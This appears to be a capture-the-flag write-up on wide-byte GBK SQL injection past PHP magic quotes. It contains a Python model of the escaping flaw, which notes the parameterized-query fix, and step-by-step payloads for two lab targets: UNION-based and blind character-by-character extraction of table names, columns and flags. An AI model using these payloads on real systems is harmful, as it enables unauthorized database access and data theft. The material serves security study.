Wide byte injection
Principle: when the magic quotes feature magic_quotes_gpc is switched on, PHP automatically adds a \ in front of characters such as ' " \, so the quote in our input can no longer close the SQL string. To get around this we enter a byte that makes the database mis-parse the input: the escape character \ and the byte we entered in front of it are read together as a single Chinese (multibyte) character, the \ is swallowed, and the quote closes the statement as intended.
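As an added illustration (not part of the original write-up), the following Python script models both sides of this principle on raw bytes: a byte-blind addslashes in the style of magic_quotes_gpc, a charset-aware escaper that understands GBK character boundaries (the behaviour of a client escaper that has been told the connection charset is GBK), and a small GBK-aware lexer that reports whether the escaped bytes still close the string literal early. The GBK lead/trail byte ranges are from the GBK code table; PAYLOAD is constructed from the %df' prefix used below.

```python
GBK_LEAD = range(0x81, 0xFF)   # first byte of a two-byte GBK character
def is_gbk_trail(b: int) -> bool:
    # second byte of a two-byte GBK character; note that 0x5C (\) qualifies
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE

def addslashes(data: bytes) -> bytes:
    """Byte-blind escaping, the way magic_quotes_gpc did it."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):          # ' " \ NUL
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def escape_gbk_aware(data: bytes) -> bytes:
    """Charset-aware escaping: copies whole GBK characters, escapes stray lead bytes."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in GBK_LEAD and i + 1 < len(data) and is_gbk_trail(data[i + 1]):
            out += data[i:i + 2]                   # complete character: copy verbatim
            i += 2
            continue
        if b in GBK_LEAD:                          # stray lead byte: escape it so it can
            out.append(0x5C)                       # never pair with a following backslash
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)

def literal_closes_early(escaped: bytes) -> bool:
    """Mimic a GBK-aware SQL lexer inside a '...' literal: does a bare quote end it early?"""
    i = 0
    while i < len(escaped):
        b = escaped[i]
        if b == 0x5C:                              # backslash: skip the escaped byte
            i += 2
        elif b in GBK_LEAD and i + 1 < len(escaped) and is_gbk_trail(escaped[i + 1]):
            i += 2                                 # two-byte character (trail may be \)
        elif b == 0x27:
            return True
        else:
            i += 1
    return False

PAYLOAD = b"\xdf' and 1=2 -- "   # constructed: the %df' prefix from the write-up, as bytes
if __name__ == "__main__":
    print(literal_closes_early(addslashes(PAYLOAD)))        # True: \xdf swallowed the backslash
    print(literal_closes_early(escape_gbk_aware(PAYLOAD)))  # False: the quote stays escaped
```

Parameterized queries avoid the problem entirely, because the input bytes never pass through the SQL lexer as part of the statement text.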
Question 1:
First enter ' and 1=2 %23 in the URL bar. The page does not change, so magic quotes are probably in effect. I therefore add a %df before the ' and re-enter the code:
%df' and 1=2 --qwe
No query result is displayed, so this is taken as the page's echo behaviour: a false condition returns nothing.
Then we can use blind injection to query the length of the database name first. Entering
%df' and length(database())>7 -- qwe
still returns data, but entering
%df' and length(database())>8 -- qwe
returns no data, so the database name is determined to be 8 bytes long.
However, I then noticed that the query results below display the field contents, so we can query the database name directly with
%df' union select 1,database(),3 -- qwe
which returns the database name immediately.
Next is a simple injection to query the table names directly; enter the code
%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe
The tables found: china_flag, user
Continue with the column names. Because of the magic quotes, the table name must be written in hexadecimal; enter the code
%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x6368696e615f666c6167 -- qwe
The columns found: Id, C_Flag
Finally, read the flag directly:
%df' union select 1,2,(select group_concat(C_flag) from china_flag)-- qwe
zKaQ-Wide, zKaQ-CAIK, zKaQ-Kzj+mz
Question 2: shooting range address
Let's try the universal code first:
') or 1=1 -- qwe
Enter this in the username field:
a') or 1=1 -- qwe
Capture the request with a packet capture tool and, in the Hex view, change the byte 61 (the a) to df so that it forms one character together with the \. After the packet is sent, the page displays no data, which means the statement we entered was executed and its truth value was evaluated. Since the echo is no data, there is wide byte injection, so we can only proceed with blind injection. Enter the code
汉') or length(database())>5 -- qwe
and raise the bound until
汉') or length(database())=8 -- qwe
which determines that the database name is 8 bytes long. Continue by entering the code:
汉') or ascii(substr(database(),1,1))>90 -- qwe
and work out the database name character by character. Since we do not need the database name for the next steps, we skip it here. We continue by querying the first character of the first table name:
汉') or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>10 -- qwe
Find all the table names in turn, which gives china_flag, and continue with the field names:
汉') or ascii(substr((select column_name from information_schema.columns where table_name=0x6368696e615f666c6167 limit 0,1),1,1))>10 -- qwe
Checking the field names, the ASCII code of the first character of the first field name comes out as 67 (C); the remaining characters are found the same way, giving the field name C_Flag.
Finally, check the data; enter the code
汉') or ascii(substr((select C_Flag from china_flag limit 0,1),1,1))>10 -- qwe
and obtain the flag zKaQ-Kzj+mz.